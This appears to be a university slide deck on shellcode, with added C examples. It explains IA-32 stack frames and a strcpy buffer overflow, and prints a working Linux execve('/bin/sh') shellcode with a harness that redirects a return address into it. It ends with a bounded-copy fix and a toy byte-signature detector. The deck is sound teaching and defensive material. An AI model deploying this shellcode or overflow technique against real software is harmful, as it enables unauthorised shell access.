Shellcode Development
- Femi Oloyede
- Pallavi Murudkar
Agenda
- Introduction
- What can Shellcode do?
- Tools for Shellcode Development
- Understanding Shellcode
- Developing Shellcode
- Methods of Detecting Shellcode

Introduction
- Shellcode is defined as a set of instructions injected into, and then executed by, an exploited program.
- Shellcodes are primarily used to exploit buffer overflows.
- The most important task when creating shellcode is to make it small and executable.

What can Shellcode do?
- Providing access to the attacked system
- Spawning /bin/sh or cmd.exe (local shell)
- Binding a shell to a port (remote shell)
- Adding a root/admin user to the system
Tools for Shellcode Development
- Nasm: used to write assembly code
- Gdb: GNU debugger, used to analyze core dump files
- Objdump: used to disassemble files
- Ktrace: traces all system calls a process is using
Next (Femi):
- Understanding Shellcode
- Developing Shellcode
- Methods of Detecting Shellcode
Understanding Shellcode
- IA-32 machine architecture (instruction set and registers)
- Program flow dynamics: process memory organization and context switching during function calls and interrupt processing
- Shellcode is injected via the modification of the return address of a function by way of a stack-based buffer overflow.
Machine Architecture
- Refer to "IA-32 Intel® Architecture Software Developer's Manual, Volume 1: Basic Architecture".
- A large amount of computer software supports the platform, including operating systems such as MS-DOS, Windows, Linux, BSD, Solaris, and Mac OS X.
EBP: Base pointer. Primarily used to hold the address of the current stack frame. Also sometimes used as a general data or address register.
ESI: General register or "source index" for string operations. Also has a one-byte LODS[size] instruction for loading data from memory into the accumulator.
EDI: General register or "destination index" for string operations. Also has a one-byte STOS[size] instruction to write data out of the accumulator.
ESP: Stack pointer. Holds the address of the top of the stack.
EIP: Instruction pointer. Holds the address of the current instruction.
Program Flow Dynamics

C code:

    void A(int a, int b, int c)
    {
        char buffer1[5];
        char buffer2[10];
    }

    int main(void)
    {
        A(1, 2, 3);
        return 0;
    }

Assembly code (the call in main, followed by the prologue of A):

    pushl $3
    pushl $2
    pushl $1
    call A

    pushl %ebp
    movl %esp,%ebp
    subl $20,%esp

Process memory organization:

    Lower memory address
      Text area
      Initialized and uninitialized data area
      Stack
    Higher memory address
Program Flow Dynamics (cont)

Stack frame of A after the prologue (top of stack at the lower address):

    Top of stack   <- ESP (stack pointer) [subl $20, %esp]
      buffer2   12 bytes
      buffer1    8 bytes
      SFP        4 bytes   <- EBP (base or frame pointer) [movl %esp, %ebp]; holds the address of the previous frame pointer [pushl %ebp]
      RET        4 bytes   address of the 'return 0' instruction of main
      a          4 bytes
      b          4 bytes
      c          4 bytes
    Bottom of stack

    EIP (instruction pointer): address of the last instruction in A
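The numbers in the diagram above (12, 8, the `subl $20, %esp`, and the argument positions) follow from one rule: every local is rounded up to a 4-byte word and placed directly below the previous one, while the arguments sit above the saved frame pointer and return address. The following C program is an added example, not code from the slides; it models that rule for the slide's function A and prints the resulting frame. The allocation order is the one the slide assumes (declaration order, first local nearest the saved EBP); real compilers may reorder or pad locals differently.

```c
#include <stdio.h>
#include <stddef.h>

#define WORD 4   /* IA-32 word size in bytes */

typedef struct {
    const char *name;
    size_t declared;   /* bytes as declared in the C source           */
    size_t allocated;  /* bytes actually reserved (rounded to a word) */
    int    offset;     /* offset of the slot's lowest byte from EBP  */
} slot_t;

/* Round a byte count up to the next multiple of the word size (5 -> 8, 10 -> 12). */
static size_t round_to_word(size_t n)
{
    return (n + WORD - 1) / WORD * WORD;
}

/* Lay out locals below EBP (negative offsets), in declaration order.
   Returns the frame size, i.e. the operand of `subl $N, %esp`. */
size_t layout_locals(slot_t *locals, size_t count)
{
    int offset = 0;
    for (size_t i = 0; i < count; i++) {
        locals[i].allocated = round_to_word(locals[i].declared);
        offset -= (int)locals[i].allocated;   /* the stack grows towards lower addresses */
        locals[i].offset = offset;
    }
    return (size_t)(-offset);
}

/* Lay out the caller-pushed arguments above EBP (positive offsets):
   SFP sits at EBP+0, RET at EBP+4, then a, b, c in order. */
void layout_args(slot_t *args, size_t count)
{
    int offset = 2 * WORD;   /* skip the saved EBP and the return address */
    for (size_t i = 0; i < count; i++) {
        args[i].allocated = round_to_word(args[i].declared);
        args[i].offset = offset;
        offset += (int)args[i].allocated;
    }
}

/* The slide's A(int a, int b, int c) with char buffer1[5] and char buffer2[10]:
   fills the two tables and returns the frame size. */
size_t frame_of_A(slot_t locals[2], slot_t args[3])
{
    slot_t l[2] = { { "buffer1", 5, 0, 0 }, { "buffer2", 10, 0, 0 } };
    slot_t a[3] = { { "a", 4, 0, 0 }, { "b", 4, 0, 0 }, { "c", 4, 0, 0 } };
    size_t frame = layout_locals(l, 2);
    layout_args(a, 3);
    for (int i = 0; i < 2; i++) locals[i] = l[i];
    for (int i = 0; i < 3; i++) args[i] = a[i];
    return frame;
}

int main(void)
{
    slot_t locals[2], args[3];
    size_t frame = frame_of_A(locals, args);

    printf("prologue reserves: subl $%zu, %%esp\n", frame);
    printf("top of stack (lower addresses)\n");
    for (int i = 1; i >= 0; i--)   /* buffer2 is lowest, then buffer1 */
        printf("  %-8s %2zu bytes  at EBP%+d\n", locals[i].name, locals[i].allocated, locals[i].offset);
    printf("  %-8s %2d bytes  at EBP+0\n", "SFP", WORD);
    printf("  %-8s %2d bytes  at EBP+4\n", "RET", WORD);
    for (int i = 0; i < 3; i++)
        printf("  %-8s %2zu bytes  at EBP%+d\n", args[i].name, args[i].allocated, args[i].offset);
    printf("bottom of stack (higher addresses)\n");
    return 0;
}
```

Running it reproduces the slide's picture: buffer2 occupies EBP-20..EBP-9, buffer1 EBP-8..EBP-1, the saved frame pointer and return address the next two words, and a, b, c at EBP+8, EBP+12 and EBP+16. That adjacency is why an overrun of buffer1 reaches RET after only 8 extra bytes.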
Stack Based Buffer Overflow

    #include <string.h>

    void A(char *str)
    {
        char buffer[4];
        strcpy(buffer, str);   /* no bounds check: copies past the 4-byte buffer */
    }

    int main(void)
    {
        char biggerString[] = "AAAAAAAAAAAA";   /* 12 'A's plus the terminator */
        A(biggerString);
        return 0;
    }

Stack frame of A while strcpy runs (top of stack at the lower address):

    Top of stack
      buffer (4)   <- AAAA
      SFP (4)      <- AAAA   (overwritten)
      RET (4)      <- AAAA   (overwritten)
      charPtr      (the str argument)
    Bottom of stack
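The copy in A() above has no idea how large buffer is, so the 12-byte input runs straight through the saved frame pointer and the return address. The following is an added example, not code from the slides: overrun_bytes() computes how far past the buffer an unchecked strcpy would write, and bounded_copy() is the replacement a code reviewer would ask for, with A_hardened() showing the slide's function using it. The 12-'A' input is the slide's; the helper names are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Number of bytes strcpy(dst, src) would write beyond a dst of bufsize
   bytes (the source length plus its terminating NUL); 0 when it fits. */
size_t overrun_bytes(size_t bufsize, const char *src)
{
    size_t needed = strlen(src) + 1;
    return needed > bufsize ? needed - bufsize : 0;
}

/* Copy src into dst, never writing more than dstsize bytes and always
   NUL-terminating.  Returns 1 if the input was truncated, 0 if it fit,
   -1 if dst has no room at all. */
int bounded_copy(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return -1;
    size_t n = strlen(src);
    if (n >= dstsize) {
        memcpy(dst, src, dstsize - 1);
        dst[dstsize - 1] = '\0';
        return 1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* The slide's A(), rewritten to use the bounded copy.  It returns the
   truncation status so the caller can reject over-long input instead of
   the copy silently clobbering SFP and RET. */
int A_hardened(const char *str)
{
    char buffer[4];
    int rc = bounded_copy(buffer, sizeof buffer, str);
    return rc;
}

int main(void)
{
    const char *big = "AAAAAAAAAAAA";   /* the slide's 12-byte input */

    /* 13 bytes needed (12 'A' + NUL) minus 4 available = 9 bytes past the
       buffer: 4 into SFP, 4 into RET, and the NUL one byte beyond that. */
    printf("strcpy into char[4] would overrun by %zu bytes\n", overrun_bytes(4, big));
    printf("A_hardened(big)   -> %d (1 = truncated, frame intact)\n", A_hardened(big));
    printf("A_hardened(\"abc\") -> %d (0 = fit)\n", A_hardened("abc"));
    return 0;
}
```

Note that "abcd" is also reported as truncated: four characters plus the terminator need five bytes, which is exactly the off-by-one that a naive length check against sizeof buffer misses.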
Developing Shellcode
- Finding the vulnerability
- Writing the shellcode

- Shellcode is a sequence of machine instructions, or opcodes.
- To take advantage of the injected code and gain access to the target system, system calls must be used.
- On Linux there are two ways of implementing a system call: the lcall7/lcall27 call gates and the 'INT 0x80' software interrupt.
Example – Spawning a Shell
1. Write the C code
2. Extract the assembly code
3. Extract the opcodes
4. Append the function-exit opcodes so that the function exits gracefully
5. Initialize a buffer with the opcodes

    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
        char *name[2];
        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
        return 0;
    }
Example – Spawning a Shell (cont'd)

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    int main(void)
    {
        int *retPtr;
        /* two words above retPtr's own slot lies main's return address */
        retPtr = (int *)&retPtr + 2;
        /* point it at the shellcode so that main "returns" into it; this
           assumes a 32-bit IA-32 build (4-byte pointers) with an executable,
           unprotected stack */
        *retPtr = (int)shellcode;
        return 0;
    }

Stack frame of main (top of stack at the lower address):

    Top of stack
      retPtr (4)   address of this slot + 2 words
      SFP (4)
      RET (4)      address of shellcode
      buffer ...
    Bottom of stack
Methods for Detecting Shellcode
- A NIDS (Network Intrusion Detection System) can be used to identify shellcode on the wire using signature databases and protocol-analysis methods.
- An IPS (Intrusion Prevention System) identifies shellcode by running the code in a sandbox or virtualized environment in order to determine whether the given code is malicious.
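The signature-database approach mentioned above amounts to scanning a captured payload for byte patterns that only make sense as machine code. The following C program is an added example, not code from the slides or from any real NIDS: a toy scanner whose three signatures are taken from the opcode sequence shown earlier in the deck (the `int 0x80` trap, the `mov $0xb,%al` that loads the execve syscall number, and the "/bin/sh" string), plus a NOP-sled heuristic. The HTTP request and the sled sample are constructed inputs; the scored shellcode is the byte string from the slides.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

typedef struct {
    const char          *name;
    const unsigned char *bytes;
    size_t               len;
} signature_t;

/* A tiny signature database built from the opcodes shown in the deck. */
static const signature_t SIGNATURES[] = {
    { "int 0x80 (Linux IA-32 syscall trap)",    (const unsigned char *)"\xcd\x80", 2 },
    { "mov $0xb,%al (execve syscall number)",    (const unsigned char *)"\xb0\x0b", 2 },
    { "\"/bin/sh\" string",                      (const unsigned char *)"/bin/sh", 7 },
};
#define NSIGS (sizeof SIGNATURES / sizeof SIGNATURES[0])

/* Binary-safe substring search; strstr() would stop at embedded NUL bytes. */
static int contains(const unsigned char *hay, size_t hlen,
                    const unsigned char *needle, size_t nlen)
{
    if (nlen == 0 || hlen < nlen)
        return 0;
    for (size_t i = 0; i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0)
            return 1;
    return 0;
}

/* Length of the longest run of 0x90 (NOP) bytes.  A long run is the "sled"
   placed in front of shellcode so that an imprecise return address still
   lands on executable filler. */
size_t longest_nop_run(const unsigned char *buf, size_t len)
{
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == 0x90) ? run + 1 : 0;
        if (run > best)
            best = run;
    }
    return best;
}

/* Score a payload: one point per matching signature plus one point for a
   NOP sled of at least min_sled bytes.  A real sensor would alert above a
   tuned threshold and log which rules fired. */
int score_payload(const unsigned char *buf, size_t len, size_t min_sled, int verbose)
{
    int score = 0;
    for (size_t s = 0; s < NSIGS; s++) {
        if (contains(buf, len, SIGNATURES[s].bytes, SIGNATURES[s].len)) {
            score++;
            if (verbose) printf("  match: %s\n", SIGNATURES[s].name);
        }
    }
    if (longest_nop_run(buf, len) >= min_sled) {
        score++;
        if (verbose) printf("  match: NOP sled of >= %zu bytes\n", min_sled);
    }
    return score;
}

/* Sample inputs: SLIDE_SHELLCODE is the byte string from the deck, the
   HTTP request is constructed as benign traffic. */
static const unsigned char SLIDE_SHELLCODE[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
static const unsigned char BENIGN_REQUEST[] =
    "GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n";

int score_slide_shellcode(void) { return score_payload(SLIDE_SHELLCODE, sizeof SLIDE_SHELLCODE - 1, 16, 0); }
int score_benign(void)          { return score_payload(BENIGN_REQUEST, sizeof BENIGN_REQUEST - 1, 16, 0); }

/* Constructed: 32 NOPs followed by a bare int 0x80 (sled heuristic + one signature). */
int score_sled_sample(void)
{
    unsigned char buf[34];
    memset(buf, 0x90, 32);
    buf[32] = 0xcd;
    buf[33] = 0x80;
    return score_payload(buf, sizeof buf, 16, 0);
}

int main(void)
{
    printf("slide shellcode:\n");
    printf("  score %d\n", score_payload(SLIDE_SHELLCODE, sizeof SLIDE_SHELLCODE - 1, 16, 1));
    printf("benign request:\n  score %d\n", score_benign());
    printf("NOP sled sample:\n  score %d\n", score_sled_sample());
    return 0;
}
```

The slide's shellcode fires all three signatures and scores 3, the HTTP request scores 0, and the sled sample scores 2. The weakness of the approach is also visible here: each rule keys on literal bytes, so a payload that avoids 0x90 filler, reaches the kernel through a different entry sequence, or builds the "/bin/sh" string at run time would pass unnoticed, which is why the deck pairs signatures with protocol analysis and sandboxed execution.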
Conclusion
- Shellcode is a powerful mechanism for the exploitation of software vulnerabilities.
- It is important that the shellcode developed is small in size.
- Shellcode can be employed to automate software security tests, where the shellcode is written to expose and draw attention to security holes.

Questions?